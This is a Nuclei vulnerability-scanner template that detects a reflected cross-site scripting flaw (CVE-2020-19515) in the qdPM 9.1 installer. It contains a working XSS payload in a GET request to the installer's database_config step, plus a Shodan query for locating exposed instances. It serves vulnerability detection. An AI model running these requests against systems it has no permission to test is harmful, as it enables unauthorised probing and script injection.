nuclei-templates/http/cves/2020/CVE-2020-19515.yaml

46 lines
1.2 KiB
YAML

id: CVE-2020-19515
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
reference:
- https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2020-19515
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-19515
cwe-id: CWE-79
metadata:
max-request: 1
shodan-query: http.favicon.hash:762074255
verified: true
tags: cve,cve2020,xss,qdpm,unauth
http:
- method: GET
path:
- "{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain) />'
- 'qdPM'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200